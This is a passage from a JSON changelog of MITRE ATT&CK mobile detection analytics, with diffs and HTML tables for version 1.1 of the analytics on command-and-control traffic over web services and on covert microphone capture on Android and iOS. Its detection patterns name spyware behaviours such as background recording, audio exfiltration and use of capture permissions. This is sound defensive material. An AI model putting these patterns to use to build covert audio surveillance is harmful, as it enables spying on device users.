\"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\n-Many properly configured firewalls may naturally block command and control traffic.\\n+The defender correlates communication to legitimate external web-service platforms with supervised managed-app context and device-state information showing that the traffic is inconsistent with the app's expected role, background-refresh profile, or user interaction timing. On iOS, the strongest reliable evidence is network telemetry tied to a managed app or device plus app state and supervision context, especially when traffic to social, collaboration, cloud-storage, or generic HTTPS platforms occurs shortly after background activity, while the device is locked, or without expected user-driven foreground execution. Direct low-level framework visibility is weaker than Android, so primary analytic confidence should be anchored to supervised app context plus network behavior rather than assumed host-level proof.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app shows background activity, refresh, or lock-state-adjacent execution temporally aligned to web-service communication without expected foreground use or recent user interaction\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Managed app communicating with legitimate web-service infrastructure is newly installed, recently updated, outside expected managed-app set, or displays baseline drift in app role, release path, or business justification\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to169__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to169__0\"><a href=\"#difflib_chg_to169__top\">t</a></td><td class=\"diff_header\" id=\"from169_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;provide&nbsp;a&nbsp;list&nbsp;of&nbsp;connectio</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to169__top\">t</a></td><td class=\"diff_header\" id=\"to169_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;communication&nbsp;to&nbsp;legitimate&nbsp;external</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;application,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;web-service&nbsp;platforms&nbsp;with&nbsp;supervised&nbsp;managed-app&nbsp;context&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;Many&nbsp;properly&nbsp;configured&nbsp;firew</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;device-state&nbsp;information&nbsp;showing&nbsp;that&nbsp;the&nbsp;traffic&nbsp;is&nbsp;inco</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">alls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nsistent&nbsp;with&nbsp;the&nbsp;app's&nbsp;expected&nbsp;role,&nbsp;background-refresh&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ofile,&nbsp;or&nbsp;user&nbsp;interaction&nbsp;timing.&nbsp;On&nbsp;iOS,&nbsp;the&nbsp;strongest&nbsp;rel</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">iable&nbsp;evidence&nbsp;is&nbsp;network&nbsp;telemetry&nbsp;tied&nbsp;to&nbsp;a&nbsp;managed&nbsp;app&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;device&nbsp;plus&nbsp;app&nbsp;state&nbsp;and&nbsp;supervision&nbsp;context,&nbsp;especially&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hen&nbsp;traffic&nbsp;to&nbsp;social,&nbsp;collaboration,&nbsp;cloud-storage,&nbsp;or&nbsp;gene</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ric&nbsp;HTTPS&nbsp;platforms&nbsp;occurs&nbsp;shortly&nbsp;after&nbsp;background&nbsp;activity</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;while&nbsp;the&nbsp;device&nbsp;is&nbsp;locked,&nbsp;or&nbsp;without&nbsp;expected&nbsp;user-drive</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;foreground&nbsp;execution.&nbsp;Direct&nbsp;low-level&nbsp;framework&nbsp;visibilit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;is&nbsp;weaker&nbsp;than&nbsp;Android,&nbsp;so&nbsp;primary&nbsp;analytic&nbsp;confidence&nbsp;sho</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">uld&nbsp;be&nbsp;anchored&nbsp;to&nbsp;supervised&nbsp;app&nbsp;context&nbsp;plus&nbsp;network&nbsp;behav</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ior&nbsp;rather&nbsp;than&nbsp;assumed&nbsp;host-level&nbsp;proof.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--d942e493-32eb-4302-890b-7729f63b7202",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-04 23:26:47.489000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0673#AN1772",
                            "external_id": "AN1772"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1772",
                    "description": "A defender observes an application holding microphone capture capability transitioning into active microphone resource usage through Android audio APIs (e.g., MediaRecorder or AudioRecord), followed by sustained capture while the application is backgrounded or the device is locked, and subsequent outbound network traffic suggesting potential audio exfiltration or streaming.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Microphone sensor activation or audio recording session initiated by application process"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions to background or executes while screen locked during microphone session"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining RECORD_AUDIO permission or privileged CAPTURE_AUDIO_OUTPUT capability"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "RecordingDurationThreshold",
                            "description": "Minimum microphone session duration before triggering detection to reduce noise from short legitimate captures."
                        },
                        {
                            "field": "BackgroundCapturePolicy",
                            "description": "Environment-specific baseline for legitimate background microphone usage"
                        },
                        {
                            "field": "CaptureToNetworkTimeWindow",
                            "description": "Time window correlating microphone activation with outbound network traffic."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"RecordingDurationThreshold\", \"description\": \"Minimum microphone session duration before triggering detection to reduce noise from short legitimate captures.\"}, {\"field\": \"BackgroundCapturePolicy\", \"description\": \"Environment-specific baseline for legitimate background microphone usage\"}, {\"field\": \"CaptureToNetworkTimeWindow\", \"description\": \"Time window correlating microphone activation with outbound network traffic.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-04 23:26:47.489000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender observes an application holding microphone capture capability transitioning into active microphone resource usage through Android audio APIs (e.g., MediaRecorder or AudioRecord), followed by sustained capture while the application is backgrounded or the device is locked, and subsequent outbound network traffic suggesting potential audio exfiltration or streaming.\", \"old_value\": \"In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\\n\\n\\nIn Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\\nAndroid applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized.\\n\\nIn both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. \", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1 @@\\n-In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\\n-\\n-\\n-In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\\n-Android applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized.\\n-\\n-In both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. \\n+A defender observes an application holding microphone capture capability transitioning into active microphone resource usage through Android audio APIs (e.g., MediaRecorder or AudioRecord), followed by sustained capture while the application is backgrounded or the device is locked, and subsequent outbound network traffic suggesting potential audio exfiltration or streaming.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Microphone sensor activation or audio recording session initiated by application process\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions to background or executes while screen locked during microphone session\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining RECORD_AUDIO permission or privileged CAPTURE_AUDIO_OUTPUT capability\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes audio buffer or recorded audio file into application storage directories\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Android Privacy Indicators\", \"description\": \"Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.\", \"url\": \"https://source.android.com/devices/tech/config/privacy-indicators\"}, \"root['external_references'][2]\": {\"source_name\": \"iOS Mic Spyware\", \"description\": \"ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.\", \"url\": \"https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to180__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to180__0\"><a href=\"#difflib_chg_to180__top\">t</a></td><td class=\"diff_header\" id=\"from180_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">In&nbsp;iOS&nbsp;14&nbsp;and&nbsp;up,&nbsp;an&nbsp;orange&nbsp;dot&nbsp;(or&nbsp;orange&nbsp;square&nbsp;if&nbsp;the&nbsp;Dif</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to180__top\">t</a></td><td class=\"diff_header\" id=\"to180_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;observes&nbsp;an&nbsp;application&nbsp;holding&nbsp;microphone&nbsp;captur</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ferentiate&nbsp;Without&nbsp;Color&nbsp;setting&nbsp;is&nbsp;enabled)&nbsp;appears&nbsp;in&nbsp;the&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;capability&nbsp;transitioning&nbsp;into&nbsp;active&nbsp;microphone&nbsp;resource&nbsp;u</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">status&nbsp;bar&nbsp;when&nbsp;the&nbsp;microphone&nbsp;is&nbsp;being&nbsp;used&nbsp;by&nbsp;an&nbsp;applicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sage&nbsp;through&nbsp;Android&nbsp;audio&nbsp;APIs&nbsp;(e.g.,&nbsp;MediaRecorder&nbsp;or&nbsp;Audi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on.&nbsp;However,&nbsp;there&nbsp;have&nbsp;been&nbsp;demonstrations&nbsp;indicating&nbsp;it&nbsp;ma</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oRecord),&nbsp;followed&nbsp;by&nbsp;sustained&nbsp;capture&nbsp;while&nbsp;the&nbsp;applicatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">y&nbsp;still&nbsp;be&nbsp;possible&nbsp;to&nbsp;access&nbsp;the&nbsp;microphone&nbsp;in&nbsp;the&nbsp;backgrou</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;is&nbsp;backgrounded&nbsp;or&nbsp;the&nbsp;device&nbsp;is&nbsp;locked,&nbsp;and&nbsp;subsequent&nbsp;ou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;without&nbsp;triggering&nbsp;this&nbsp;visual&nbsp;indicator&nbsp;by&nbsp;abusing&nbsp;featu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tbound&nbsp;network&nbsp;traffic&nbsp;suggesting&nbsp;potential&nbsp;audio&nbsp;exfiltrati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">res&nbsp;that&nbsp;natively&nbsp;access&nbsp;the&nbsp;microphone&nbsp;or&nbsp;camera&nbsp;but&nbsp;do&nbsp;not</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;or&nbsp;streaming.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;trigger&nbsp;the&nbsp;visual&nbsp;indicators.(Citation:&nbsp;iOS&nbsp;Mic&nbsp;Spyware)&nbsp;&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;In&nbsp;Android&nbsp;12&nbsp;and&nbsp;up,&nbsp;a&nbsp;green&nbsp;dot&nbsp;appears&nbsp;in&nbsp;the&nbsp;status&nbsp;bar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;when&nbsp;the&nbsp;microphone&nbsp;is&nbsp;being&nbsp;used&nbsp;by&nbsp;an&nbsp;application.(Citati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on:&nbsp;Android&nbsp;Privacy&nbsp;Indicators)&nbsp;Android&nbsp;applications&nbsp;using&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;`RECORD_AUDIO`&nbsp;permission&nbsp;and&nbsp;iOS&nbsp;applications&nbsp;using&nbsp;`Req</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">uestRecordPermission`&nbsp;should&nbsp;be&nbsp;carefully&nbsp;reviewed&nbsp;and&nbsp;monit</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ored.&nbsp;If&nbsp;the&nbsp;`CAPTURE_AUDIO_OUTPUT`&nbsp;permission&nbsp;is&nbsp;found&nbsp;in&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;third-party&nbsp;Android&nbsp;application,&nbsp;the&nbsp;application&nbsp;should&nbsp;be&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">heavily&nbsp;scrutinized.&nbsp;&nbsp;In&nbsp;both&nbsp;Android&nbsp;(6.0&nbsp;and&nbsp;up)&nbsp;and&nbsp;iOS,&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;user&nbsp;can&nbsp;review&nbsp;which&nbsp;applications&nbsp;have&nbsp;the&nbsp;permission&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">o&nbsp;access&nbsp;the&nbsp;microphone&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;revoke&nbsp;permissions&nbsp;as&nbsp;necessary.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4623e949-e902-4a8c-893b-73e5ab4b57d5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-04 23:33:56.647000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0673#AN1773",
                            "external_id": "AN1773"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1773",
                    "description": "A defender observes an application with declared microphone capability initiating microphone resource use through iOS audio frameworks, potentially during background execution or shortly after a silent wake event, followed by sustained audio capture and outbound encrypted traffic suggesting audio streaming or upload activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Microphone sensor activation or audio recording session initiated by application process"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions to background or executes while screen locked during microphone session"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Application installed with NSMicrophoneUsageDescription entitlement indicating microphone capability"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ExpectedAudioAppsBaseline",
                            "description": "Allow-list of legitimate applications expected to record audio on the device."
                        },
                        {
                            "field": "BackgroundWakeCorrelationWindow",
                            "description": "Time window correlating background wake events with microphone activation."
                        },
                        {
                            "field": "MicSessionDurationThreshold",
                            "description": "Minimum microphone recording duration considered suspicious."
                        },
                        {
                            "field": "MicToNetworkCorrelationWindow",
                            "description": "Time window linking microphone activation to outbound network activity."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for outbound traffic volume indicating possible audio upload."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
